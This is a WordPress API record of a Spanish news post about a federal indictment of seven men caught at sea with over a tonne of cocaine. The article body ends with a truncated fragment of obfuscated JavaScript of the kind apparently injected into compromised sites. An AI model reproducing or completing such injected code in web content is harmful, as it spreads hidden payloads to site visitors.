{"id":388,"date":"2022-03-09T22:10:14","date_gmt":"2022-03-09T22:10:14","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=388"},"modified":"2022-03-09T22:10:15","modified_gmt":"2022-03-09T22:10:15","slug":"fgr-obtiene-vinculacion-a-proceso-por-transporte-de-mas-de-una-tonelada-de-cocaina","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=388","title":{"rendered":"FGR OBTIENE VINCULACI\u00d3N A PROCESO POR TRANSPORTE DE M\u00c1S DE UNA TONELADA DE COCA\u00cdNA"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1646863386108-1024x1024.jpg\" alt=\"\" class=\"wp-image-389\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1646863386108-1024x1024.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1646863386108-300x300.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1646863386108-150x150.jpg 150w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1646863386108-768x768.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1646863386108.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Cortes\u00eda<br>09 de Marzo del 2022. La Fiscal\u00eda General de la Rep\u00fablica (FGR), a trav\u00e9s de la Fiscal\u00eda Especializada en materia de Delincuencia Organizada (FEMDO), obtuvo vinculaci\u00f3n a proceso en contra de siete personas (cinco guatemaltecos y dos ecuatorianos), a quienes se les asegur\u00f3 m\u00e1s de una tonelada de clorhidrato de coca\u00edna que transportaban a bordo de dos embarcaciones.<\/p>\n\n\n\n<p>Los ahora vinculados fueron detenidos por elementos de la Secretar\u00eda de Marina &#8211; Armada de M\u00e9xico (SEMAR), en febrero pasado, a 341 millas n\u00e1uticas del Oc\u00e9ano Pac\u00edfico, asegur\u00e1ndoles dos embarcaciones donde localizaron costales con mil 150 paquetes en forma de ladrillo que conten\u00edan mil 119 kilos 846.8 gramos de clorhidrato de coca\u00edna, dos balizas (se\u00f1al que se utiliza para guiar a los navegantes), un aparato GPS y cuatro tel\u00e9fonos celulares.<\/p>\n\n\n\n<p>Posteriormente, el Ministerio P\u00fablico Federal (MPF), present\u00f3 datos de prueba al Juez de Control quien calific\u00f3 de legal la detenci\u00f3n y vincul\u00f3 a proceso a Osman \u201cG\u201d, Abel \u201cP\u201d, Tony \u201cL\u201d, Ismael \u201cD\u201d y Fredy \u201cV\u201d, todos ellos de nacionalidad guatemalteca; as\u00ed como a Jimmy \u201cM\u201d y Edwin \u201cM\u201d, ambos ecuatorianos, por el delito de contra la salud en la modalidad de posesi\u00f3n con fines de introducci\u00f3n al pa\u00eds de narc\u00f3tico con la agravante de cometerlo en pandilla.<\/p>\n\n\n\n<p>Se les impuso como medida cautelar la prisi\u00f3n preventiva oficiosa y un plazo de dos meses para la investigaci\u00f3n complementaria. Quedaron recluidos en el Centro de Reinserci\u00f3n Social # 3 en Tapachula, Chiapas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Cortes\u00eda09 de Marzo del 2022. La Fiscal\u00eda General de la Rep\u00fablica (FGR), a trav\u00e9s de la Fiscal\u00eda Especializada en materia de Delincuencia Organizada (FEMDO), obtuvo vinculaci\u00f3n a proceso en contra de siete personas (cinco guatemaltecos y dos ecuatorianos), a quienes se les asegur\u00f3 m\u00e1s de una tonelada de clorhidrato de coca\u00edna que transportaban a bordo &hellip;<\/p>\n","protected":false},"author":2,"featured_media":389,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-388","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/388","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=388"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/388\/revisions"}],"predecessor-version":[{"id":390,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/388\/revisions\/390"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/389"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=388"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=388"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=388"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}